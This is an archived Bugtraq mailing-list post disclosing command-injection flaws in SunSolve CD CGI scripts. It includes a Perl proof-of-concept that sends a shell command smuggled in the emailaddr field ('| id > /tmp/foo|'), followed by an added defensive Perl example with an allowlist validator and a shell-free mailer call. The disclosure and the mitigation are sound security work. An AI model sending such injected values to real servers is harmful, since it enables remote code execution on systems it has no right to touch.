Bugtraq mailing list archives
SunSolve CD cgi scripts...
From: Fyodor <fyarochkin () trusecure com>
Date: Mon, 11 Mar 2002 12:46:06 +0700
Sun never responded to this mail so I guess they don't consider the bug to be serious ... could be worth mentioning though.

----- Forwarded message from Fyodor <fyodor () relaygroup com> -----

Date: Sat, 16 Jun 2001 23:24:45 +0700
From: Fyodor <fyodor () relaygroup com>
To: security-alert () sun com
Subject: SunSolve CD security problems..

Hey folks,

while playing with Sunsolve CD cgi scripts we found quite a few user input validation problems which may pose security risks (remote code execution). Here's a perl script to test it quickly:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);

$ua = new LWP::UserAgent;
$ua->agent("Scrapers");
my $req = POST 'http://sunsolveCD.box.com:8383/cd-cgi/sscd_suncourier.pl',
    [ step => "submit" , emailaddr => "foo\@bar.com| id > /tmp/foo|"];
$res = $ua->request($req);
print $res->as_string;
print "code", $res->code, "\n";

cheers,
-Fyodor

----- End forwarded message -----
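
An added example, not part of the original post and not SunSolve code: the post does not show the CGI's source, so this assumes the emailaddr field ends up on a mailer command line, and shows the two mitigations for that pattern: an allowlist check on the address and a list-form pipe open that never invokes a shell. The function names and the sendmail-compatible mailer path passed as $mailer are hypothetical.

```perl
#!/usr/bin/perl
# Added example (not SunSolve code): defensive handling of an e-mail form field.
use strict;
use warnings;

# Allowlist check: one local part, one dotted domain, and nothing else.
# Shell metacharacters, whitespace and control characters never match.
# \A ... \z (rather than ^ ... $) also rejects a trailing newline.
sub valid_emailaddr {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9._%+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/
        ? 1 : 0;
}

# Hand the message to the mailer without a shell. The list form of a pipe
# open execs the program directly, so "|", ";" and ">" inside an argument
# are plain bytes. $mailer is a hypothetical path to a sendmail-compatible
# binary; "--" ends option parsing so an address cannot be read as a flag.
sub send_mail {
    my ($mailer, $addr, $body) = @_;
    die "rejected address\n" unless valid_emailaddr($addr);
    open(my $mail, '|-', $mailer, '-i', '--', $addr)
        or die "cannot run $mailer: $!\n";
    print {$mail} "To: $addr\nSubject: Requested document\n\n$body\n";
    close($mail) or die "mailer failed: $?\n";
}

# Constructed inputs, including the value used by the test script in the post.
# Only the validator is exercised here, so this runs without a mailer.
for my $addr ('foo@bar.com', 'foo@bar.com| id > /tmp/foo|', "foo\@bar.com\n") {
    (my $shown = $addr) =~ s/\n/\\n/g;
    printf "%-32s %s\n", $shown, valid_emailaddr($addr) ? 'accept' : 'reject';
}
```

Either measure alone would stop the value from the post; using both keeps the script safe if the validation pattern is later loosened.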